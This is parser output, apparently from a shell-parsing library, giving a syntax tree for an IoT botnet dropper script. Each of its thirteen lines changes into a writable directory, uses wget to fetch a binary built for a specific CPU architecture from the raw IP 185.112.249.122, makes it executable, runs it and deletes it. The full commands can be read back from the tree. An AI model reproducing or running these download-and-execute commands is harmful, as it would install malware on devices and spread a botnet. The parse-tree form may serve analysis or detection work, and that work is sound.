ListNode(lineno=2, pos=(12, 162), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 37), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 37), word='/var/system'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(38, 40)),
  CommandNode(lineno=2, pos=(41, 48), parts=[
    WordNode(lineno=2, pos=(41, 43), word='cd'),
    WordNode(lineno=2, pos=(44, 48), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(49, 51)),
  CommandNode(lineno=2, pos=(52, 60), parts=[
    WordNode(lineno=2, pos=(52, 54), word='cd'),
    WordNode(lineno=2, pos=(55, 60), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(61, 63)),
  CommandNode(lineno=2, pos=(64, 68), parts=[
    WordNode(lineno=2, pos=(64, 66), word='cd'),
    WordNode(lineno=2, pos=(67, 68), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(68, 69)),
  CommandNode(lineno=2, pos=(70, 108), parts=[
    WordNode(lineno=2, pos=(70, 74), word='wget'),
    WordNode(lineno=2, pos=(75, 108), word='http://185.112.249.122/jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(108, 109)),
  CommandNode(lineno=2, pos=(110, 129), parts=[
    WordNode(lineno=2, pos=(110, 115), word='chmod'),
    WordNode(lineno=2, pos=(116, 118), word='+x'),
    WordNode(lineno=2, pos=(119, 129), word='jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(129, 130)),
  CommandNode(lineno=2, pos=(131, 143), parts=[
    WordNode(lineno=2, pos=(131, 143), word='./jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(143, 144)),
  CommandNode(lineno=2, pos=(145, 162), parts=[
    WordNode(lineno=2, pos=(145, 147), word='rm'),
    WordNode(lineno=2, pos=(148, 151), word='-rf'),
    WordNode(lineno=2, pos=(152, 162), word='jackmymips'),
  ]),
])
ListNode(lineno=3, pos=(163, 321), parts=[
  CommandNode(lineno=3, pos=(163, 170), parts=[
    WordNode(lineno=3, pos=(163, 165), word='cd'),
    WordNode(lineno=3, pos=(166, 170), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(171, 173)),
  CommandNode(lineno=3, pos=(174, 188), parts=[
    WordNode(lineno=3, pos=(174, 176), word='cd'),
    WordNode(lineno=3, pos=(177, 188), word='/var/system'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(189, 191)),
  CommandNode(lineno=3, pos=(192, 199), parts=[
    WordNode(lineno=3, pos=(192, 194), word='cd'),
    WordNode(lineno=3, pos=(195, 199), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(200, 202)),
  CommandNode(lineno=3, pos=(203, 211), parts=[
    WordNode(lineno=3, pos=(203, 205), word='cd'),
    WordNode(lineno=3, pos=(206, 211), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(212, 214)),
  CommandNode(lineno=3, pos=(215, 219), parts=[
    WordNode(lineno=3, pos=(215, 217), word='cd'),
    WordNode(lineno=3, pos=(218, 219), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(219, 220)),
  CommandNode(lineno=3, pos=(221, 261), parts=[
    WordNode(lineno=3, pos=(221, 225), word='wget'),
    WordNode(lineno=3, pos=(226, 261), word='http://185.112.249.122/jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(261, 262)),
  CommandNode(lineno=3, pos=(263, 284), parts=[
    WordNode(lineno=3, pos=(263, 268), word='chmod'),
    WordNode(lineno=3, pos=(269, 271), word='+x'),
    WordNode(lineno=3, pos=(272, 284), word='jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(284, 285)),
  CommandNode(lineno=3, pos=(286, 300), parts=[
    WordNode(lineno=3, pos=(286, 300), word='./jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(300, 301)),
  CommandNode(lineno=3, pos=(302, 321), parts=[
    WordNode(lineno=3, pos=(302, 304), word='rm'),
    WordNode(lineno=3, pos=(305, 308), word='-rf'),
    WordNode(lineno=3, pos=(309, 321), word='jackmymips64'),
  ]),
])
ListNode(lineno=4, pos=(322, 480), parts=[
  CommandNode(lineno=4, pos=(322, 329), parts=[
    WordNode(lineno=4, pos=(322, 324), word='cd'),
    WordNode(lineno=4, pos=(325, 329), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(330, 332)),
  CommandNode(lineno=4, pos=(333, 347), parts=[
    WordNode(lineno=4, pos=(333, 335), word='cd'),
    WordNode(lineno=4, pos=(336, 347), word='/var/system'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 358), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 358), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(359, 361)),
  CommandNode(lineno=4, pos=(362, 370), parts=[
    WordNode(lineno=4, pos=(362, 364), word='cd'),
    WordNode(lineno=4, pos=(365, 370), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(371, 373)),
  CommandNode(lineno=4, pos=(374, 378), parts=[
    WordNode(lineno=4, pos=(374, 376), word='cd'),
    WordNode(lineno=4, pos=(377, 378), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(378, 379)),
  CommandNode(lineno=4, pos=(380, 420), parts=[
    WordNode(lineno=4, pos=(380, 384), word='wget'),
    WordNode(lineno=4, pos=(385, 420), word='http://185.112.249.122/jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(420, 421)),
  CommandNode(lineno=4, pos=(422, 443), parts=[
    WordNode(lineno=4, pos=(422, 427), word='chmod'),
    WordNode(lineno=4, pos=(428, 430), word='+x'),
    WordNode(lineno=4, pos=(431, 443), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(443, 444)),
  CommandNode(lineno=4, pos=(445, 459), parts=[
    WordNode(lineno=4, pos=(445, 459), word='./jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(459, 460)),
  CommandNode(lineno=4, pos=(461, 480), parts=[
    WordNode(lineno=4, pos=(461, 463), word='rm'),
    WordNode(lineno=4, pos=(464, 467), word='-rf'),
    WordNode(lineno=4, pos=(468, 480), word='jackmymipsel'),
  ]),
])
ListNode(lineno=5, pos=(481, 635), parts=[
  CommandNode(lineno=5, pos=(481, 488), parts=[
    WordNode(lineno=5, pos=(481, 483), word='cd'),
    WordNode(lineno=5, pos=(484, 488), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(489, 491)),
  CommandNode(lineno=5, pos=(492, 506), parts=[
    WordNode(lineno=5, pos=(492, 494), word='cd'),
    WordNode(lineno=5, pos=(495, 506), word='/var/system'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(507, 509)),
  CommandNode(lineno=5, pos=(510, 517), parts=[
    WordNode(lineno=5, pos=(510, 512), word='cd'),
    WordNode(lineno=5, pos=(513, 517), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(518, 520)),
  CommandNode(lineno=5, pos=(521, 529), parts=[
    WordNode(lineno=5, pos=(521, 523), word='cd'),
    WordNode(lineno=5, pos=(524, 529), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(530, 532)),
  CommandNode(lineno=5, pos=(533, 537), parts=[
    WordNode(lineno=5, pos=(533, 535), word='cd'),
    WordNode(lineno=5, pos=(536, 537), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(537, 538)),
  CommandNode(lineno=5, pos=(539, 578), parts=[
    WordNode(lineno=5, pos=(539, 543), word='wget'),
    WordNode(lineno=5, pos=(544, 578), word='http://185.112.249.122/jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(578, 579)),
  CommandNode(lineno=5, pos=(580, 600), parts=[
    WordNode(lineno=5, pos=(580, 585), word='chmod'),
    WordNode(lineno=5, pos=(586, 588), word='+x'),
    WordNode(lineno=5, pos=(589, 600), word='jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(600, 601)),
  CommandNode(lineno=5, pos=(602, 615), parts=[
    WordNode(lineno=5, pos=(602, 615), word='./jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(615, 616)),
  CommandNode(lineno=5, pos=(617, 635), parts=[
    WordNode(lineno=5, pos=(617, 619), word='rm'),
    WordNode(lineno=5, pos=(620, 623), word='-rf'),
    WordNode(lineno=5, pos=(624, 635), word='jackmysh2eb'),
  ]),
])
ListNode(lineno=6, pos=(636, 794), parts=[
  CommandNode(lineno=6, pos=(636, 643), parts=[
    WordNode(lineno=6, pos=(636, 638), word='cd'),
    WordNode(lineno=6, pos=(639, 643), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(644, 646)),
  CommandNode(lineno=6, pos=(647, 661), parts=[
    WordNode(lineno=6, pos=(647, 649), word='cd'),
    WordNode(lineno=6, pos=(650, 661), word='/var/system'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(662, 664)),
  CommandNode(lineno=6, pos=(665, 672), parts=[
    WordNode(lineno=6, pos=(665, 667), word='cd'),
    WordNode(lineno=6, pos=(668, 672), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(673, 675)),
  CommandNode(lineno=6, pos=(676, 684), parts=[
    WordNode(lineno=6, pos=(676, 678), word='cd'),
    WordNode(lineno=6, pos=(679, 684), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(685, 687)),
  CommandNode(lineno=6, pos=(688, 692), parts=[
    WordNode(lineno=6, pos=(688, 690), word='cd'),
    WordNode(lineno=6, pos=(691, 692), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(692, 693)),
  CommandNode(lineno=6, pos=(694, 734), parts=[
    WordNode(lineno=6, pos=(694, 698), word='wget'),
    WordNode(lineno=6, pos=(699, 734), word='http://185.112.249.122/jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(734, 735)),
  CommandNode(lineno=6, pos=(736, 757), parts=[
    WordNode(lineno=6, pos=(736, 741), word='chmod'),
    WordNode(lineno=6, pos=(742, 744), word='+x'),
    WordNode(lineno=6, pos=(745, 757), word='jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(757, 758)),
  CommandNode(lineno=6, pos=(759, 773), parts=[
    WordNode(lineno=6, pos=(759, 773), word='./jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(773, 774)),
  CommandNode(lineno=6, pos=(775, 794), parts=[
    WordNode(lineno=6, pos=(775, 777), word='rm'),
    WordNode(lineno=6, pos=(778, 781), word='-rf'),
    WordNode(lineno=6, pos=(782, 794), word='jackmysh2elf'),
  ]),
])
ListNode(lineno=7, pos=(795, 941), parts=[
  CommandNode(lineno=7, pos=(795, 802), parts=[
    WordNode(lineno=7, pos=(795, 797), word='cd'),
    WordNode(lineno=7, pos=(798, 802), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(803, 805)),
  CommandNode(lineno=7, pos=(806, 820), parts=[
    WordNode(lineno=7, pos=(806, 808), word='cd'),
    WordNode(lineno=7, pos=(809, 820), word='/var/system'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(821, 823)),
  CommandNode(lineno=7, pos=(824, 831), parts=[
    WordNode(lineno=7, pos=(824, 826), word='cd'),
    WordNode(lineno=7, pos=(827, 831), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(832, 834)),
  CommandNode(lineno=7, pos=(835, 843), parts=[
    WordNode(lineno=7, pos=(835, 837), word='cd'),
    WordNode(lineno=7, pos=(838, 843), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(844, 846)),
  CommandNode(lineno=7, pos=(847, 851), parts=[
    WordNode(lineno=7, pos=(847, 849), word='cd'),
    WordNode(lineno=7, pos=(850, 851), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(851, 852)),
  CommandNode(lineno=7, pos=(853, 890), parts=[
    WordNode(lineno=7, pos=(853, 857), word='wget'),
    WordNode(lineno=7, pos=(858, 890), word='http://185.112.249.122/jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(890, 891)),
  CommandNode(lineno=7, pos=(892, 910), parts=[
    WordNode(lineno=7, pos=(892, 897), word='chmod'),
    WordNode(lineno=7, pos=(898, 900), word='+x'),
    WordNode(lineno=7, pos=(901, 910), word='jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(910, 911)),
  CommandNode(lineno=7, pos=(912, 923), parts=[
    WordNode(lineno=7, pos=(912, 923), word='./jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(923, 924)),
  CommandNode(lineno=7, pos=(925, 941), parts=[
    WordNode(lineno=7, pos=(925, 927), word='rm'),
    WordNode(lineno=7, pos=(928, 931), word='-rf'),
    WordNode(lineno=7, pos=(932, 941), word='jackmysh4'),
  ]),
])
ListNode(lineno=8, pos=(942, 1088), parts=[
  CommandNode(lineno=8, pos=(942, 949), parts=[
    WordNode(lineno=8, pos=(942, 944), word='cd'),
    WordNode(lineno=8, pos=(945, 949), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(950, 952)),
  CommandNode(lineno=8, pos=(953, 967), parts=[
    WordNode(lineno=8, pos=(953, 955), word='cd'),
    WordNode(lineno=8, pos=(956, 967), word='/var/system'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(968, 970)),
  CommandNode(lineno=8, pos=(971, 978), parts=[
    WordNode(lineno=8, pos=(971, 973), word='cd'),
    WordNode(lineno=8, pos=(974, 978), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(979, 981)),
  CommandNode(lineno=8, pos=(982, 990), parts=[
    WordNode(lineno=8, pos=(982, 984), word='cd'),
    WordNode(lineno=8, pos=(985, 990), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(991, 993)),
  CommandNode(lineno=8, pos=(994, 998), parts=[
    WordNode(lineno=8, pos=(994, 996), word='cd'),
    WordNode(lineno=8, pos=(997, 998), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(998, 999)),
  CommandNode(lineno=8, pos=(1000, 1037), parts=[
    WordNode(lineno=8, pos=(1000, 1004), word='wget'),
    WordNode(lineno=8, pos=(1005, 1037), word='http://185.112.249.122/jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1037, 1038)),
  CommandNode(lineno=8, pos=(1039, 1057), parts=[
    WordNode(lineno=8, pos=(1039, 1044), word='chmod'),
    WordNode(lineno=8, pos=(1045, 1047), word='+x'),
    WordNode(lineno=8, pos=(1048, 1057), word='jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1057, 1058)),
  CommandNode(lineno=8, pos=(1059, 1070), parts=[
    WordNode(lineno=8, pos=(1059, 1070), word='./jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1070, 1071)),
  CommandNode(lineno=8, pos=(1072, 1088), parts=[
    WordNode(lineno=8, pos=(1072, 1074), word='rm'),
    WordNode(lineno=8, pos=(1075, 1078), word='-rf'),
    WordNode(lineno=8, pos=(1079, 1088), word='jackmyx86'),
  ]),
])
ListNode(lineno=9, pos=(1089, 1239), parts=[
  CommandNode(lineno=9, pos=(1089, 1096), parts=[
    WordNode(lineno=9, pos=(1089, 1091), word='cd'),
    WordNode(lineno=9, pos=(1092, 1096), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1097, 1099)),
  CommandNode(lineno=9, pos=(1100, 1114), parts=[
    WordNode(lineno=9, pos=(1100, 1102), word='cd'),
    WordNode(lineno=9, pos=(1103, 1114), word='/var/system'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1115, 1117)),
  CommandNode(lineno=9, pos=(1118, 1125), parts=[
    WordNode(lineno=9, pos=(1118, 1120), word='cd'),
    WordNode(lineno=9, pos=(1121, 1125), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1126, 1128)),
  CommandNode(lineno=9, pos=(1129, 1137), parts=[
    WordNode(lineno=9, pos=(1129, 1131), word='cd'),
    WordNode(lineno=9, pos=(1132, 1137), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1138, 1140)),
  CommandNode(lineno=9, pos=(1141, 1145), parts=[
    WordNode(lineno=9, pos=(1141, 1143), word='cd'),
    WordNode(lineno=9, pos=(1144, 1145), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1145, 1146)),
  CommandNode(lineno=9, pos=(1147, 1185), parts=[
    WordNode(lineno=9, pos=(1147, 1151), word='wget'),
    WordNode(lineno=9, pos=(1152, 1185), word='http://185.112.249.122/jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1185, 1186)),
  CommandNode(lineno=9, pos=(1187, 1206), parts=[
    WordNode(lineno=9, pos=(1187, 1192), word='chmod'),
    WordNode(lineno=9, pos=(1193, 1195), word='+x'),
    WordNode(lineno=9, pos=(1196, 1206), word='jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1206, 1207)),
  CommandNode(lineno=9, pos=(1208, 1220), parts=[
    WordNode(lineno=9, pos=(1208, 1220), word='./jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1220, 1221)),
  CommandNode(lineno=9, pos=(1222, 1239), parts=[
    WordNode(lineno=9, pos=(1222, 1224), word='rm'),
    WordNode(lineno=9, pos=(1225, 1228), word='-rf'),
    WordNode(lineno=9, pos=(1229, 1239), word='jackmyi486'),
  ]),
])
ListNode(lineno=10, pos=(1240, 1390), parts=[
  CommandNode(lineno=10, pos=(1240, 1247), parts=[
    WordNode(lineno=10, pos=(1240, 1242), word='cd'),
    WordNode(lineno=10, pos=(1243, 1247), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1248, 1250)),
  CommandNode(lineno=10, pos=(1251, 1265), parts=[
    WordNode(lineno=10, pos=(1251, 1253), word='cd'),
    WordNode(lineno=10, pos=(1254, 1265), word='/var/system'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1266, 1268)),
  CommandNode(lineno=10, pos=(1269, 1276), parts=[
    WordNode(lineno=10, pos=(1269, 1271), word='cd'),
    WordNode(lineno=10, pos=(1272, 1276), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1277, 1279)),
  CommandNode(lineno=10, pos=(1280, 1288), parts=[
    WordNode(lineno=10, pos=(1280, 1282), word='cd'),
    WordNode(lineno=10, pos=(1283, 1288), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1289, 1291)),
  CommandNode(lineno=10, pos=(1292, 1296), parts=[
    WordNode(lineno=10, pos=(1292, 1294), word='cd'),
    WordNode(lineno=10, pos=(1295, 1296), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1296, 1297)),
  CommandNode(lineno=10, pos=(1298, 1336), parts=[
    WordNode(lineno=10, pos=(1298, 1302), word='wget'),
    WordNode(lineno=10, pos=(1303, 1336), word='http://185.112.249.122/jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1336, 1337)),
  CommandNode(lineno=10, pos=(1338, 1357), parts=[
    WordNode(lineno=10, pos=(1338, 1343), word='chmod'),
    WordNode(lineno=10, pos=(1344, 1346), word='+x'),
    WordNode(lineno=10, pos=(1347, 1357), word='jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1357, 1358)),
  CommandNode(lineno=10, pos=(1359, 1371), parts=[
    WordNode(lineno=10, pos=(1359, 1371), word='./jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1371, 1372)),
  CommandNode(lineno=10, pos=(1373, 1390), parts=[
    WordNode(lineno=10, pos=(1373, 1375), word='rm'),
    WordNode(lineno=10, pos=(1376, 1379), word='-rf'),
    WordNode(lineno=10, pos=(1380, 1390), word='jackmyi586'),
  ]),
])
ListNode(lineno=11, pos=(1391, 1541), parts=[
  CommandNode(lineno=11, pos=(1391, 1398), parts=[
    WordNode(lineno=11, pos=(1391, 1393), word='cd'),
    WordNode(lineno=11, pos=(1394, 1398), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1399, 1401)),
  CommandNode(lineno=11, pos=(1402, 1416), parts=[
    WordNode(lineno=11, pos=(1402, 1404), word='cd'),
    WordNode(lineno=11, pos=(1405, 1416), word='/var/system'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1417, 1419)),
  CommandNode(lineno=11, pos=(1420, 1427), parts=[
    WordNode(lineno=11, pos=(1420, 1422), word='cd'),
    WordNode(lineno=11, pos=(1423, 1427), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1428, 1430)),
  CommandNode(lineno=11, pos=(1431, 1439), parts=[
    WordNode(lineno=11, pos=(1431, 1433), word='cd'),
    WordNode(lineno=11, pos=(1434, 1439), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1440, 1442)),
  CommandNode(lineno=11, pos=(1443, 1447), parts=[
    WordNode(lineno=11, pos=(1443, 1445), word='cd'),
    WordNode(lineno=11, pos=(1446, 1447), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1447, 1448)),
  CommandNode(lineno=11, pos=(1449, 1487), parts=[
    WordNode(lineno=11, pos=(1449, 1453), word='wget'),
    WordNode(lineno=11, pos=(1454, 1487), word='http://185.112.249.122/jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1487, 1488)),
  CommandNode(lineno=11, pos=(1489, 1508), parts=[
    WordNode(lineno=11, pos=(1489, 1494), word='chmod'),
    WordNode(lineno=11, pos=(1495, 1497), word='+x'),
    WordNode(lineno=11, pos=(1498, 1508), word='jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1508, 1509)),
  CommandNode(lineno=11, pos=(1510, 1522), parts=[
    WordNode(lineno=11, pos=(1510, 1522), word='./jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1522, 1523)),
  CommandNode(lineno=11, pos=(1524, 1541), parts=[
    WordNode(lineno=11, pos=(1524, 1526), word='rm'),
    WordNode(lineno=11, pos=(1527, 1530), word='-rf'),
    WordNode(lineno=11, pos=(1531, 1541), word='jackmyi686'),
  ]),
])
ListNode(lineno=12, pos=(1542, 1704), parts=[
  CommandNode(lineno=12, pos=(1542, 1549), parts=[
    WordNode(lineno=12, pos=(1542, 1544), word='cd'),
    WordNode(lineno=12, pos=(1545, 1549), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1550, 1552)),
  CommandNode(lineno=12, pos=(1553, 1567), parts=[
    WordNode(lineno=12, pos=(1553, 1555), word='cd'),
    WordNode(lineno=12, pos=(1556, 1567), word='/var/system'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1568, 1570)),
  CommandNode(lineno=12, pos=(1571, 1578), parts=[
    WordNode(lineno=12, pos=(1571, 1573), word='cd'),
    WordNode(lineno=12, pos=(1574, 1578), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1579, 1581)),
  CommandNode(lineno=12, pos=(1582, 1590), parts=[
    WordNode(lineno=12, pos=(1582, 1584), word='cd'),
    WordNode(lineno=12, pos=(1585, 1590), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1591, 1593)),
  CommandNode(lineno=12, pos=(1594, 1598), parts=[
    WordNode(lineno=12, pos=(1594, 1596), word='cd'),
    WordNode(lineno=12, pos=(1597, 1598), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1598, 1599)),
  CommandNode(lineno=12, pos=(1600, 1641), parts=[
    WordNode(lineno=12, pos=(1600, 1604), word='wget'),
    WordNode(lineno=12, pos=(1605, 1641), word='http://185.112.249.122/jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1641, 1642)),
  CommandNode(lineno=12, pos=(1643, 1665), parts=[
    WordNode(lineno=12, pos=(1643, 1648), word='chmod'),
    WordNode(lineno=12, pos=(1649, 1651), word='+x'),
    WordNode(lineno=12, pos=(1652, 1665), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1665, 1666)),
  CommandNode(lineno=12, pos=(1667, 1682), parts=[
    WordNode(lineno=12, pos=(1667, 1682), word='./jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1682, 1683)),
  CommandNode(lineno=12, pos=(1684, 1704), parts=[
    WordNode(lineno=12, pos=(1684, 1686), word='rm'),
    WordNode(lineno=12, pos=(1687, 1690), word='-rf'),
    WordNode(lineno=12, pos=(1691, 1704), word='jackmypowerpc'),
  ]),
])
ListNode(lineno=13, pos=(1705, 1887), parts=[
  CommandNode(lineno=13, pos=(1705, 1712), parts=[
    WordNode(lineno=13, pos=(1705, 1707), word='cd'),
    WordNode(lineno=13, pos=(1708, 1712), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1713, 1715)),
  CommandNode(lineno=13, pos=(1716, 1730), parts=[
    WordNode(lineno=13, pos=(1716, 1718), word='cd'),
    WordNode(lineno=13, pos=(1719, 1730), word='/var/system'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1731, 1733)),
  CommandNode(lineno=13, pos=(1734, 1741), parts=[
    WordNode(lineno=13, pos=(1734, 1736), word='cd'),
    WordNode(lineno=13, pos=(1737, 1741), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1742, 1744)),
  CommandNode(lineno=13, pos=(1745, 1753), parts=[
    WordNode(lineno=13, pos=(1745, 1747), word='cd'),
    WordNode(lineno=13, pos=(1748, 1753), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1754, 1756)),
  CommandNode(lineno=13, pos=(1757, 1761), parts=[
    WordNode(lineno=13, pos=(1757, 1759), word='cd'),
    WordNode(lineno=13, pos=(1760, 1761), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1761, 1762)),
  CommandNode(lineno=13, pos=(1763, 1809), parts=[
    WordNode(lineno=13, pos=(1763, 1767), word='wget'),
    WordNode(lineno=13, pos=(1768, 1809), word='http://185.112.249.122/jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1809, 1810)),
  CommandNode(lineno=13, pos=(1811, 1838), parts=[
    WordNode(lineno=13, pos=(1811, 1816), word='chmod'),
    WordNode(lineno=13, pos=(1817, 1819), word='+x'),
    WordNode(lineno=13, pos=(1820, 1838), word='jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1838, 1839)),
  CommandNode(lineno=13, pos=(1840, 1860), parts=[
    WordNode(lineno=13, pos=(1840, 1860), word='./jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1860, 1861)),
  CommandNode(lineno=13, pos=(1862, 1887), parts=[
    WordNode(lineno=13, pos=(1862, 1864), word='rm'),
    WordNode(lineno=13, pos=(1865, 1868), word='-rf'),
    WordNode(lineno=13, pos=(1869, 1887), word='jackmypowerpc440fp'),
  ]),
])
ListNode(lineno=14, pos=(1888, 2038), parts=[
  CommandNode(lineno=14, pos=(1888, 1895), parts=[
    WordNode(lineno=14, pos=(1888, 1890), word='cd'),
    WordNode(lineno=14, pos=(1891, 1895), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1896, 1898)),
  CommandNode(lineno=14, pos=(1899, 1913), parts=[
    WordNode(lineno=14, pos=(1899, 1901), word='cd'),
    WordNode(lineno=14, pos=(1902, 1913), word='/var/system'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1914, 1916)),
  CommandNode(lineno=14, pos=(1917, 1924), parts=[
    WordNode(lineno=14, pos=(1917, 1919), word='cd'),
    WordNode(lineno=14, pos=(1920, 1924), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1925, 1927)),
  CommandNode(lineno=14, pos=(1928, 1936), parts=[
    WordNode(lineno=14, pos=(1928, 1930), word='cd'),
    WordNode(lineno=14, pos=(1931, 1936), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1937, 1939)),
  CommandNode(lineno=14, pos=(1940, 1944), parts=[
    WordNode(lineno=14, pos=(1940, 1942), word='cd'),
    WordNode(lineno=14, pos=(1943, 1944), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1944, 1945)),
  CommandNode(lineno=14, pos=(1946, 1984), parts=[
    WordNode(lineno=14, pos=(1946, 1950), word='wget'),
    WordNode(lineno=14, pos=(1951, 1984), word='http://185.112.249.122/jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1984, 1985)),
  CommandNode(lineno=14, pos=(1986, 2005), parts=[
    WordNode(lineno=14, pos=(1986, 1991), word='chmod'),
    WordNode(lineno=14, pos=(1992, 1994), word='+x'),
    WordNode(lineno=14, pos=(1995, 2005), word='jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2005, 2006)),
  CommandNode(lineno=14, pos=(2007, 2019), parts=[
    WordNode(lineno=14, pos=(2007, 2019), word='./jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2019, 2020)),
  CommandNode(lineno=14, pos=(2021, 2038), parts=[
    WordNode(lineno=14, pos=(2021, 2023), word='rm'),
    WordNode(lineno=14, pos=(2024, 2027), word='-rf'),
    WordNode(lineno=14, pos=(2028, 2038), word='jackmym86k'),
  ]),
])
